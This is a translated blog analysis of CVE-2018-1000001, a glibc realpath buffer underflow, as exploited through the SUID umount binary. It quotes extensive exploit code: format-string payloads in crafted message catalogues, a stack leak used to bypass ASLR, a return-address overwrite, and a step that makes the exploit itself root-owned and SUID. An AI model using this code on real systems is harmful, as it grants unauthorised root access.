CVE-2018-1000001: Analysis of the glibc realpath Buffer Overflow Vulnerability

houjingyi, 看雪学院 (Kanxue Academy), 2019-05-26

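This vulnerability dates from the beginning of this year. I did not understand it at the time and then went home for the Spring Festival, so over the past few days I decided to work through it properly. Corrections are welcome wherever my explanation falls short.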

Vulnerability principle

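First we need to understand what realpath does. realpath expands all symbolic links and resolves the /./ and /../ components in the null-terminated pathname given by path, producing a canonicalized absolute pathname.

The resulting pathname is stored, null-terminated, in the buffer pointed to by resolved_path, and it contains no symbolic links, /./ or /../ components. For example, if /home/root contains a file 1.txt, then calling realpath("../../1.txt", resolved_path) from the directory /home/root/11/22 leaves /home/root/1.txt in resolved_path.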

char *realpath(const char *path, char *resolved_path);
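
As a small illustration of the interface described above, the following sketch wraps realpath in a helper. The name canonicalize and its return convention are assumptions made for this example and are not part of glibc.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: canonicalize `path` into `out` (capacity `outlen`).
   Returns 0 on success, -1 if realpath fails or the result does not fit. */
int canonicalize(const char *path, char *out, size_t outlen)
{
    char *resolved;
    size_t n;
    int rc = -1;

    assert(path != NULL && out != NULL);
    /* With a NULL second argument, realpath allocates the result itself. */
    resolved = realpath(path, NULL);
    if (resolved == NULL)
        return -1;
    n = strlen(resolved);
    if (n < outlen) {
        memcpy(out, resolved, n + 1);   /* copy including the terminator */
        rc = 0;
    }
    free(resolved);
    return rc;
}
```

Letting realpath allocate the result avoids having to guess a buffer size up front; the caller-side length check then decides whether the result fits.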

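The implementation is as follows (glibc-2.24\stdlib\canonicalize.c). It first decides whether path is relative or absolute: if the first character is "/" the path is absolute, otherwise it is relative. For a relative path it calls getcwd to obtain the absolute path of the current directory and then combines it with the information in path to build the absolute pathname, as in the example above. From the programmer's point of view, whether path is relative or absolute, the first character of rpath ends up being "/", so rpath is always an absolute path.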

  if (name[0] != '/')
    {
      if (!__getcwd (rpath, path_max))
        {
          rpath[0] = '\0';
          goto error;
        }
      dest = __rawmemchr (rpath, '\0');
    }
  else
    {
      rpath[0] = '/';
      dest = rpath + 1;
    }

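Next, a for loop splits path on "/" and handles each component in turn. end - start == 1 && start[0] == '.' is the "./" case, which denotes the current directory and needs no processing. end - start == 2 && start[0] == '.' && start[1] == '.' is the "../" case, which denotes the parent directory. rpath and dest point to the start and the end of the absolute path obtained from getcwd, so in this case dest is moved backwards until a "/" is reached. In the earlier example, moving back twice from /home/root/11/22 yields /home/root/.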

  for (start = end = name; *start; start = end)
    {
      struct stat64 st;
      int n;

      /* Skip sequence of multiple path-separators.  */
      while (*start == '/')
        ++start;

      /* Find end of path component.  */
      for (end = start; *end && *end != '/'; ++end)
        /* Nothing.  */;

      if (end - start == 0)
        break;
      else if (end - start == 1 && start[0] == '.')
        /* nothing */;
      else if (end - start == 2 && start[0] == '.' && start[1] == '.')
        {
          /* Back up to previous component, ignore if at root already.  */
          if (dest > rpath + 1)
            while ((--dest)[-1] != '/');
        }
      else
        {

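In any other case, this component of path is copied to dest. In the earlier example, copying 1.txt after /home/root/ gives /home/root/1.txt.

      dest = __mempcpy (dest, start, end - start);
      *dest = '\0';

It then checks whether rpath is now a symbolic link and, if so, expands it.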

if (S_ISLNK (st.st_mode))
    {
      ……
      n = __readlink (rpath, buf, path_max - 1);
      ……
      /* Careful here, end may be a pointer into extra_buf... */
      memmove (&extra_buf[n], end, len + 1);
      name = end = memcpy (extra_buf, buf, n);
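
Leaving symlink expansion aside, the component loop walked through above can be sketched as a purely lexical resolver. This is a simplified illustration and not the glibc code: the function name lexical_resolve is hypothetical, the buffer is tracked by index instead of by pointer, and a working directory that does not start with "/" is rejected outright.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical sketch: resolve `name` against `cwd` without touching the
   filesystem. Returns 0 on success, -1 if `cwd` is not absolute or the
   result does not fit into `out`. */
int lexical_resolve(const char *cwd, const char *name, char *out, size_t outlen)
{
    size_t len;
    const char *start, *end;

    assert(cwd != NULL && name != NULL && out != NULL);
    if (outlen < 2)
        return -1;
    if (name[0] != '/') {
        size_t n = strlen(cwd);
        if (cwd[0] != '/' || n + 1 > outlen)
            return -1;                    /* refuse a non-absolute cwd */
        memcpy(out, cwd, n);
        len = n;
        while (len > 1 && out[len - 1] == '/')
            len--;                        /* drop trailing slashes */
    } else {
        out[0] = '/';
        len = 1;
    }
    for (start = name; *start; start = end) {
        size_t clen;
        while (*start == '/')
            ++start;                      /* skip repeated separators */
        for (end = start; *end && *end != '/'; ++end)
            ;
        clen = (size_t)(end - start);
        if (clen == 0)
            break;
        if (clen == 1 && start[0] == '.')
            continue;                     /* "." : nothing to do */
        if (clen == 2 && start[0] == '.' && start[1] == '.') {
            /* ".." : back up one component, bounded by the index. */
            while (len > 1 && out[len - 1] != '/')
                len--;
            if (len > 1)
                len--;                    /* drop the separating slash */
            continue;
        }
        if (len + clen + 2 > outlen)
            return -1;
        if (out[len - 1] != '/')
            out[len++] = '/';
        memcpy(out + len, start, clen);   /* append the component */
        len += clen;
    }
    out[len] = '\0';
    return 0;
}
```

Because the back-up step is bounded by len > 1 rather than by finding a "/", it cannot step in front of the buffer even if the stored prefix were malformed.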

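The code used to be correct, but the Linux kernel changed getcwd so that, when the directory is unreachable, the returned string is prefixed with (unreachable). glibc was not updated accordingly and still assumed that getcwd returns an absolute path. realpath therefore only tests name[0] != '/' to decide that the argument is a relative path, and never considers that the working directory it gets back may start with "(" instead of "/". When the for loop then handles a "../" component and moves dest backwards, there is no "/" left in front of it, so --dest keeps going past the start of the buffer and the subsequent copy writes in front of the buffer, i.e. a buffer underflow.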
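
The effect of the unbounded back-up step can be reproduced safely in a toy model. In the sketch below, everything lives in one local array, the string before stands in for whatever happens to sit in front of the real buffer (the real heap also contains allocator metadata, which is ignored here), and the function name simulate_dotdot is made up for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Toy model: `before` is the data in front of the realpath buffer, `cwd`
   the string that getcwd stored in rpath. Returns dest - rpath after one
   ".." component; a negative value means dest left the buffer. */
ptrdiff_t simulate_dotdot(const char *before, const char *cwd)
{
    char arena[256];
    size_t before_len = strlen(before);
    size_t cwd_len = strlen(cwd);
    char *rpath, *dest;

    assert(before_len + cwd_len + 2 <= sizeof arena);
    arena[0] = '/';                  /* sentinel so the scan always stops */
    memcpy(arena + 1, before, before_len);
    rpath = arena + 1 + before_len;
    memcpy(rpath, cwd, cwd_len + 1);
    dest = rpath + cwd_len;

    /* Same back-up step as in canonicalize.c. */
    if (dest > rpath + 1)
        while ((--dest)[-1] != '/')
            ;
    return dest - rpath;
}
```

With an absolute working directory such as /home/root/11/22 the result stays inside the buffer. With (unreachable) and /usr/lib/locale/C.utf8/LC_CTYPE placed in front of it, dest ends up 8 bytes before rpath, right after the last "/" of the preceding string.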

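Exploitation

POC

The original author published a DoS POC. The test environment is Debian Stretch amd64 with libc6 2.24-11+deb9u1 and util-linux-2.29.2-1. I happened to have exactly this environment: after running the POC, the machine shut down after a short while.

Let us look at how this DoS POC works.

The vulnerability is triggered through umount from util-linux, for two main reasons:

1. umount calls realpath to resolve paths, and it can be run by any user;

2. umount is a SUID binary. Such a file temporarily gives the caller the privileges of the file's owner while it runs, so it can be used for privilege escalation. The realpath operations in umount work on the heap, so a reproducible heap layout has to be created.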

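The POC achieves this by removing environment variables that could interfere and keeping only the locale. The locale is used by glibc and by other programs and libraries that need localization to interpret text such as times and dates. It is initialized before umount parses its arguments, so it affects the heap structure and the content at the lower addresses in front of the realpath buffer.

On a standard system, libc provides /usr/lib/locale/C.UTF-8, which is loaded through the environment variable LC_ALL=C.UTF-8. The POC writes some content to the file (unreachable)/tmp/from_archive/C/LC_MESSAGES/util-linux.mo; base64-decoding and then decompressing the text from the command line yields that content.

po stands for portable object and mo for machine object. A po file is a resource file extracted from the source code for translators. When the software is upgraded, processing the po file with the gettext package lets existing translations be carried over to some extent and eases the translators' workload.

A mo file is a binary file for the machine, compiled from a po file by the gettext package. A program reads the mo file to switch its interface to the user's language. A prebuilt gettext for Windows can be downloaded, and msgunfmt.exe from its bin directory converts a mo file back into a po file on the command line.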

msgunfmt.exe xxx.mo -o xxx.po
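
To make the binary layout of a mo file a little more concrete, here is a minimal sketch that reads the fixed header of a GNU mo file (magic number 0x950412de, revision, number of strings, and the offsets of the original and translated string tables). The struct and function names are assumptions for this example, and only the little-endian layout is handled.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MO_MAGIC 0x950412deu

/* Illustrative subset of the mo header fields. */
struct mo_header {
    uint32_t revision;
    uint32_t nstrings;
    uint32_t orig_tab_offset;   /* table of msgid (length, offset) pairs */
    uint32_t trans_tab_offset;  /* table of msgstr (length, offset) pairs */
};

static uint32_t read_le32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Returns 0 on success, -1 if the buffer is too short or the magic number
   does not match a little-endian mo file. */
int parse_mo_header(const unsigned char *buf, size_t len, struct mo_header *out)
{
    assert(buf != NULL && out != NULL);
    if (len < 20 || read_le32(buf) != MO_MAGIC)
        return -1;
    out->revision = read_le32(buf + 4);
    out->nstrings = read_le32(buf + 8);
    out->orig_tab_offset = read_le32(buf + 12);
    out->trans_tab_offset = read_le32(buf + 16);
    return 0;
}
```

Each table entry is a (length, offset) pair, so a lookup tool like msgunfmt only needs these two offsets and the string count to enumerate every msgid and msgstr.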

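msgid is the original text in the code and msgstr is its translation, so "%s: not mounted" will be replaced by "AA%6$lnlnAAAAAAAAAAA", as will be visible while debugging. Next we debug in gdb to better understand the POC, first confirming the glibc and util-linux versions.

The umount shipped with the system has no symbols, so download the source and rebuild it.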

sudo apt-get install dpkg-dev automake
sudo apt-get source util-linux
cd util-linux-2.29.2
./configure
make && sudo make install

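Note that environment variables and arguments are set in gdb with set env and set args.

Because (unreachable) contains no "/", --dest keeps moving backwards past (unreachable) until it reaches C.utf8/LC_CTYPE, where the LC_CTYPE after the "/" gets overwritten.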

In the debugger, the result of each of the three successive __mempcpy calls can be observed, after which realpath returns (unreachable)/x.

Execution then continues through umount_one->mk_exit_code->warnx(_("%s: not mounted"), tgt). gettext is called before warnx, and the original "%s: not mounted" is replaced by "AA%6$lnlnAAAAAAAAAAA".

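With the %n conversion of fprintf, certain memory addresses can be written. Because the stack layout used by fprintf is fixed, the effect of ASLR can be ignored. We can therefore use this to overwrite the restricted field of the libmnt_context structure.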

struct libmnt_context
{
        int     action;         /* MNT_ACT_{MOUNT,UMOUNT} */
        int     restricted;     /* root or not? */
 
        char    *fstype_pattern;        /* for mnt_match_fstype() */
        char    *optstr_pattern;        /* for mnt_match_options() */
...
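
The following sketch shows in isolation what a %ln write does to two adjacent int fields laid out like the first two members of the structure above. It assumes a little-endian platform where long is twice the size of int (as on amd64); ctx_head, ctx_overlay and the initial field values are stand-ins invented for this example, not libmount definitions.

```c
#include <assert.h>
#include <stdio.h>

/* Stand-in for the first two fields of the context structure. */
struct ctx_head {
    int action;
    int restricted;
};

/* The union lets the same bytes be written as one long and read as two ints. */
union ctx_overlay {
    struct ctx_head head;
    long raw;
};

/* Formats a string with the same shape as the malicious msgstr and returns
   the two fields as they look after the %ln store. */
struct ctx_head overwrite_with_percent_n(void)
{
    union ctx_overlay c;
    char sink[32];

    c.raw = 0;
    c.head.action = 7;        /* arbitrary starting values */
    c.head.restricted = 1;
    /* Two characters are emitted before %1$ln, so the long value 2 is stored. */
    snprintf(sink, sizeof sink, "AA%1$lnAAAAAA", &c.raw);
    return c.head;
}
```

Under these assumptions the low half of the stored long lands in action and the high half, which is zero, lands in restricted, so a short prefix such as "AA" is enough to clear the flag.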

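When a filesystem is mounted, the original content of the mount point directory is hidden and unavailable until the filesystem is unmounted. The owner and permissions of the mount point directory, however, are not hidden, and the restricted flag is used to limit access to the mounted filesystem. Once this value has been overwritten, umount mistakenly believes that the operation comes from root. DoS can then be achieved by unmounting the root filesystem.

EXP

With the POC understood, we turn to the privilege escalation EXP, which follows the same idea. Apart from a few helper functions, the code has two main parts: the first, prepareNamespacedProcess, does the preparation, and the second, attemptEscalation, triggers the vulnerability and escalates privileges.

Compiled and run normally, it escalates privileges flawlessly.

Run under gdb, however, it gets stuck.

This puzzled me for a long time. After a lot of searching I finally understood that setuid or setgid programs can only be debugged when the debugger itself runs as root: the kernel does not allow ptrace on a program running with extra privileges. If gdb is run as root, the program can be run under it, but only its behaviour as root can be observed. To debug the program when it was not started by root, start it outside gdb and then attach gdb to it.

prepareNamespacedProcess mainly does the following.

1. It sets setgroups to deny, which prevents setgroups from being called inside the new namespace to change groups, and it sets up uid_map and gid_map so that the child process can set up the mount points.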

char idMapFileName[128];
    char idMapData[128];
    sprintf(idMapFileName, "/proc/%d/setgroups", namespacedProcessPid);
    int setGroupsFd=open(idMapFileName, O_WRONLY);
    assert(setGroupsFd>=0);
    int result=write(setGroupsFd, "deny", 4);
    assert(result>0);
    close(setGroupsFd);
 
    sprintf(idMapFileName, "/proc/%d/uid_map", namespacedProcessPid);
    int uidMapFd=open(idMapFileName, O_WRONLY);
    assert(uidMapFd>=0);
    sprintf(idMapData, "0 %d 1\n", getuid());
    result=write(uidMapFd, idMapData, strlen(idMapData));
    assert(result>0);
    close(uidMapFd);
 
    sprintf(idMapFileName, "/proc/%d/gid_map", namespacedProcessPid);
    int gidMapFd=open(idMapFileName, O_WRONLY);
    assert(gidMapFd>=0);
    sprintf(idMapData, "0 %d 1\n", getgid());
    result=write(gidMapFd, idMapData, strlen(idMapData));
    assert(result>0);
    close(gidMapFd);
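
Each line written to uid_map or gid_map has the form "ID-inside-namespace ID-outside-namespace length". The small sketch below builds such a line with a bounds check; the function name format_id_map is an assumption for this example.

```c
#include <assert.h>
#include <stdio.h>

/* Formats one uid_map/gid_map line into `buf`.
   Returns the line length, or -1 if it does not fit. */
int format_id_map(char *buf, size_t buflen,
                  unsigned inside_id, unsigned outside_id, unsigned count)
{
    int n;

    assert(buf != NULL);
    n = snprintf(buf, buflen, "%u %u %u\n", inside_id, outside_id, count);
    if (n < 0 || (size_t)n >= buflen)
        return -1;
    return n;
}
```

For a caller with uid 1000 this yields "0 1000 1\n", which maps uid 0 inside the namespace to uid 1000 outside it, the same mapping the exploit writes with sprintf.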

2. It creates the following directories and files.

// Create directories needed for umount to proceed to final state
// "not mounted".
  createDirectoryRecursive(namespaceMountBaseDir, "(unreachable)/x");
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "(unreachable)/tmp/%s/C.UTF-8/LC_MESSAGES", osReleaseExploitData[2]);
  assert(result<PATH_MAX);
  createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "(unreachable)/tmp/%s/X.X/LC_MESSAGES", osReleaseExploitData[2]);
  createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "(unreachable)/tmp/%s/X.x/LC_MESSAGES", osReleaseExploitData[2]);
  createDirectoryRecursive(namespaceMountBaseDir, pathBuffer);

3. It creates a symbolic link at /proc/5600/cwd/(unreachable)/tmp/down that points to ../x/../../AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/A and is used to trigger the underflow.

// Create symlink to trigger underflows.
  result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/(unreachable)/tmp/down",
      namespaceMountBaseDir);
  assert(result<PATH_MAX);
  result=symlink(osReleaseExploitData[1], pathBuffer);
  assert(!result||(errno==EEXIST));

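4. It creates /proc/5600/cwd/DATEMSK and writes into it a shebang (that is, "#!") followed by the path of the exploit program. getdate uses the format templates in the file named by the environment variable DATEMSK, which will be used in the next part.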

// getdate will leave that string in rdi to become the filename
// to execute for the next round.
  char *selfPathName=realpath("/proc/self/exe", NULL);
  result=snprintf(pathBuffer, sizeof(pathBuffer), "%s/DATEMSK",
      namespaceMountBaseDir);
  assert(result<PATH_MAX);
  int handle=open(pathBuffer, O_WRONLY|O_CREAT|O_TRUNC, 0755);
  assert(handle>0);
  result=snprintf(pathBuffer, sizeof(pathBuffer), "#!%s\nunused",
      selfPathName);
  assert(result<PATH_MAX);
  result=write(handle, pathBuffer, result);
  close(handle);
  free(selfPathName);

5. It creates /proc/5600/cwd/(unreachable)/tmp/_nl_load_locale_from_archive/C.UTF-8/LC_MESSAGES/util-linux.mo and writes the required data into it.

// Write the initial message catalogue to trigger stack dumping
// and to make the "umount" call privileged by toggling the "restricted"
// flag in the context.
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "%s/(unreachable)/tmp/%s/C.UTF-8/LC_MESSAGES/util-linux.mo",
      namespaceMountBaseDir, osReleaseExploitData[2]);
  assert(result<PATH_MAX);
 
  char *stackDumpStr=(char*)malloc(0x80+6*(STACK_LONG_DUMP_BYTES/8));
  assert(stackDumpStr);
  char *stackDumpStrEnd=stackDumpStr;
  stackDumpStrEnd+=sprintf(stackDumpStrEnd, "AA%%%d$lnAAAAAA",
      ((int*)osReleaseExploitData[3])[ED_STACK_OFFSET_CTX]);
  for(int dumpCount=(STACK_LONG_DUMP_BYTES/8); dumpCount; dumpCount--) {
    memcpy(stackDumpStrEnd, "%016lx", 6);
    stackDumpStrEnd+=6;
  }
// We wrote already 8 bytes, write so many more to produce a
// count of 'L' and write that to the stack. As all writes so far
// sum up to a count aligned by 8, and 'L'==0x4c, we will have
// to write at least 4 bytes, which is longer than any "%hhx"
// format string output. Hence do not care about the byte content
// here. The target write address has a 16 byte alignment due
// to varg structure.
  stackDumpStrEnd+=sprintf(stackDumpStrEnd, "%%1$%dhhx%%%d$hhn",
      ('L'-8-STACK_LONG_DUMP_BYTES*2)&0xff,
      STACK_LONG_DUMP_BYTES/16);
  *stackDumpStrEnd=0;
  result=writeMessageCatalogue(pathBuffer,
      (char*[]){
          "%s: mountpoint not found",
          "%s: not mounted",
          "%s: target is busy\n        (In some cases useful info about processes that\n         use the device is found by lsof(8) or fuser(1).)"
      },
      (char*[]){"1234", stackDumpStr, "5678"},
      3);
  assert(!result);
  free(stackDumpStr);
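
The padding arithmetic behind the final "%hhx" / "%hhn" pair in the format string built above can be checked separately. In the sketch below the function names are made up, and the dump size is a parameter because the value of STACK_LONG_DUMP_BYTES is not shown in this excerpt; 4096 is used purely as an example value.

```c
#include <assert.h>

/* Characters emitted before the padding: 8 preamble characters plus
   16 hex digits for every dumped 8-byte word. */
unsigned long chars_before_pad(unsigned long dump_bytes)
{
    assert(dump_bytes % 8 == 0);
    return 8 + (dump_bytes / 8) * 16;
}

/* Field width that makes the running output count congruent to `target`
   modulo 256, which is the value a %hhn store will then write. */
unsigned pad_width_for_byte(unsigned long already_written, unsigned char target)
{
    return (unsigned)((target - already_written) & 0xff);
}
```

For a 4096-byte dump, 8200 characters precede the padding, the required width is 68, and 8200 + 68 is congruent to 0x4c ('L') modulo 256.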

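Converted to a po file, its content can be inspected.

6. It creates /proc/5600/cwd/(unreachable)/tmp/_nl_load_locale_from_archive/X.X/LC_MESSAGES/util-linux.mo as a FIFO and records the corresponding X.x path for the second-phase catalogue.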

result=snprintf(pathBuffer, sizeof(pathBuffer),
      "%s/(unreachable)/tmp/%s/X.X/LC_MESSAGES/util-linux.mo",
      namespaceMountBaseDir, osReleaseExploitData[2]);
  assert(result<PATH_MAX);
  result=mknod(pathBuffer, S_IFIFO|0666, S_IFIFO);
  assert((!result)||(errno==EEXIST));
  secondPhaseTriggerPipePathname=strdup(pathBuffer);
 
  result=snprintf(pathBuffer, sizeof(pathBuffer),
      "%s/(unreachable)/tmp/%s/X.x/LC_MESSAGES/util-linux.mo",
      namespaceMountBaseDir, osReleaseExploitData[2]);
  secondPhaseCataloguePathname=strdup(pathBuffer);
 
  free(namespaceMountBaseDir);
  return(namespacedProcessPid);

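attemptEscalation mainly does the following.

1. In the forked child process, it sets a large number of AANGUAGE = X.X environment variables to spray the stack. When realpath underflows inside umount, the mo file prepared earlier is loaded. The format string dumps the stack to stderr, modifies the restricted flag and turns AANGUAGE = X.X into LANGUAGE = X.X (the single-byte %hhn write replaces the leading 'A' with 'L').

2. The parent process goes through the following phases:

Phase 0 searches the output for the eight 'A' characters emitted after the overflow in order to locate where the data starts.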

case 0: // Initial sync: read A*8 preamble.
          if(readDataLength<8)
            continue;
          char *preambleStart=memmem(readBuffer, readDataLength,
              "AAAAAAAA", 8);
          if(!preambleStart) {
// No preamble, move content only if buffer is full.
            if(readDataLength==sizeof(readBuffer))
              moveLength=readDataLength-7;
            break;
          }
// We found, what we are looking for. Start reading the stack.
          escalationPhase++;
          moveLength=preambleStart-readBuffer+8;

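Phase 1 reads the stack data to bypass ASLR. Once the libc address has been found, it prepares to replace the return address with the addresses of getdate and execl, and then writes this information to the second-phase catalogue /proc/5600/cwd/(unreachable)/tmp/_nl_load_locale_from_archive/X.x/LC_MESSAGES/util-linux.mo (secondPhaseCataloguePathname).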

case 1: // Read the stack.
// Consume stack data until our local array is full.
          while(moveLength+16<=readDataLength) {
            result=sscanf(readBuffer+moveLength, "%016lx",
                (unsigned long*)(stackData+stackDataBytes));
            if(result!=1) {
// Scanning failed, the data injection procedure apparently did
// not work, so this escalation failed.
              goto attemptEscalationCleanup;
            }
            moveLength+=sizeof(long)*2;
            stackDataBytes+=sizeof(long);
// See if we reached end of stack dump already.
            if(stackDataBytes==sizeof(stackData))
              break;
          }
          if(stackDataBytes!=sizeof(stackData))
            break;
 
// All data read, use it to prepare the content for the next phase.
          fprintf(stderr, "Stack content received, calculating next phase\n");
 
          int *exploitOffsets=(int*)osReleaseExploitData[3];
 
// This is the address, where source Pointer is pointing to.
          void *sourcePointerTarget=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARGV]];
// This is the stack address source for the target pointer.
          void *sourcePointerLocation=sourcePointerTarget-0xd0;
 
          void *targetPointerTarget=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARG0]];
// This is the stack address of the libc start function return
// pointer.
          void *libcStartFunctionReturnAddressSource=sourcePointerLocation-0x10;
          fprintf(stderr, "Found source address location %p pointing to target address %p with value %p, libc offset is %p\n",
              sourcePointerLocation, sourcePointerTarget,
              targetPointerTarget, libcStartFunctionReturnAddressSource);
// So the libcStartFunctionReturnAddressSource is the lowest address
// to manipulate, targetPointerTarget+...
 
          void *libcStartFunctionAddress=((void**)stackData)[exploitOffsets[ED_STACK_OFFSET_ARGV]-2];
          void *stackWriteData[]={
              libcStartFunctionAddress+exploitOffsets[ED_LIBC_GETDATE_DELTA],
              libcStartFunctionAddress+exploitOffsets[ED_LIBC_EXECL_DELTA]
          };
          fprintf(stderr, "Changing return address from %p to %p, %p\n",
              libcStartFunctionAddress, stackWriteData[0],
              stackWriteData[1]);
          escalationPhase++;
 
          char *escalationString=(char*)malloc(1024);
          createStackWriteFormatString(
              escalationString, 1024,
              exploitOffsets[ED_STACK_OFFSET_ARGV]+1, // Stack position of argv pointer argument for fprintf
              sourcePointerTarget, // Base value to write
              exploitOffsets[ED_STACK_OFFSET_ARG0]+1, // Stack position of argv[0] pointer ...
              libcStartFunctionReturnAddressSource,
              (unsigned short*)stackWriteData,
              sizeof(stackWriteData)/sizeof(unsigned short)
          );
          fprintf(stderr, "Using escalation string %s", escalationString);
 
          result=writeMessageCatalogue(
              secondPhaseCataloguePathname,
              (char*[]){
                  "%s: mountpoint not found",
                  "%s: not mounted",
                  "%s: target is busy\n        (In some cases useful info about processes that\n         use the device is found by lsof(8) or fuser(1).)"
              },
              (char*[]){
                  escalationString,
                  "BBBB5678%3$s\n",
                  "BBBBABCD%s\n"},
              3);
          assert(!result);
          break;
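
The stack-reading step of phase 1 boils down to decoding a stream of 16-digit hex words. The sketch below does this without sscanf; the function names are hypothetical, and the decoder simply stops at the first chunk that is not pure hex.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Value of one hex digit, or -1 if `c` is not a hex digit. */
static int hex_digit(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decodes consecutive 16-digit hex words from `text` (length `len`) into
   `out`. Returns the number of words decoded, at most `max_words`. */
size_t parse_stack_dump(const char *text, size_t len,
                        unsigned long long *out, size_t max_words)
{
    size_t count = 0;

    assert(text != NULL && out != NULL);
    while (count < max_words && (count + 1) * 16 <= len) {
        unsigned long long value = 0;
        size_t i;
        for (i = 0; i < 16; i++) {
            int d = hex_digit(text[count * 16 + i]);
            if (d < 0)
                return count;         /* malformed chunk: stop here */
            value = (value << 4) | (unsigned long long)d;
        }
        out[count++] = value;
    }
    return count;
}
```

Once the words are decoded, adding a per-release delta to a leaked libc return address gives the addresses of the target functions, which is what the exploit does with ED_LIBC_GETDATE_DELTA and ED_LIBC_EXECL_DELTA.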

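Converted to a po file, its content can be inspected.

Phase 2: because LANGUAGE has changed, util-linux.mo is read again. The parent waits, in non-blocking mode, for the trigger pipe to be opened and then moves on to the next phase.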

if(escalationPhase==2) {
// We cannot use the standard poll from below to monitor the pipe,
// but also we do not want to block forever. Wait for the pipe
// in nonblocking mode and then continue with next phase.
      result=waitForTriggerPipeOpen(secondPhaseTriggerPipePathname);
      if(result) {
        goto attemptEscalationCleanup;
      }
      escalationPhase++;
    }
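
The body of waitForTriggerPipeOpen is not shown here. One way such a wait could work, sketched under that caveat, relies on the fact that opening a FIFO write-only with O_NONBLOCK fails with ENXIO as long as no process has it open for reading. All function names below are assumptions for this example.

```c
#define _XOPEN_SOURCE 700
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* Creates the FIFO; an already existing one is accepted. */
int create_trigger_fifo(const char *path)
{
    if (mkfifo(path, 0600) == 0 || errno == EEXIST)
        return 0;
    return -1;
}

/* Polls until some process has opened the FIFO for reading.
   Returns 0 once a reader is present, -1 on error or after
   `max_attempts` unsuccessful tries. */
int wait_for_fifo_reader(const char *path, int max_attempts)
{
    struct timespec pause = { 0, 10 * 1000 * 1000 };   /* 10 ms */
    int i;

    assert(path != NULL);
    for (i = 0; i < max_attempts; i++) {
        int fd = open(path, O_WRONLY | O_NONBLOCK);
        if (fd >= 0) {
            close(fd);                /* a reader exists, we are done */
            return 0;
        }
        if (errno != ENXIO)
            return -1;                /* unexpected failure */
        nanosleep(&pause, NULL);
    }
    return -1;
}
```

The attempt limit keeps the caller from blocking forever, which matches the intent stated in the comment of the original code.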

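Phase 3 reads the output of umount (the comment in the code says "result from mount", which is presumably a slip for umount), does some cleanup and waits for the ROP chain to be entered.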

case 3:
// Wait for pipe connection and output any result from mount.
          readDataLength=0;
          break;

attemptEscalationCleanup:
// Wait some time to avoid killing umount even when exploit was
// successful.
  sleep(1);
  close(childStdout);
// It is safe to kill the child as we did not wait for it to finish
// yet, so at least the zombie process is still here.
  kill(childPid, SIGKILL);
  pid_t waitedPid=waitpid(childPid, NULL, 0);
  assert(waitedPid==childPid);
 
  return(escalationSuccess);

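Earlier, prepareNamespacedProcess wrote a shebang (that is, "#!") plus the path of the exploit program into the file named by DATEMSK, so the operating system invokes the exploit program as the interpreter. The exploit program then changes its own file ownership and mode to make itself a root-owned SUID binary and exits.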

if(geteuid()==0) {
    struct stat statBuf;
    int result=stat("/proc/self/exe", &statBuf);
    assert(!result);
    if(statBuf.st_uid||statBuf.st_gid) {
      fprintf(stderr, "%s: internal invocation, setting SUID mode\n",
          programmName);
      int handle=open("/proc/self/exe", O_RDONLY);
      fchown(handle, 0, 0);
      fchmod(handle, 04755);
      exit(0);
    }

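After the umount process exits, the main process does some cleanup and can then start a shell directly. Privilege escalation succeeded!

References

1. LibcRealpathBufferUnderflow

2. glibc Realpath缓冲区下溢漏洞(CVE–2018–1000001)分析 (Analysis of the glibc realpath buffer underflow vulnerability, CVE-2018-1000001)

Original article by chpeagle, 看雪论坛 (Kanxue Forum)

When reposting, please credit the 看雪社区 (Kanxue community)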
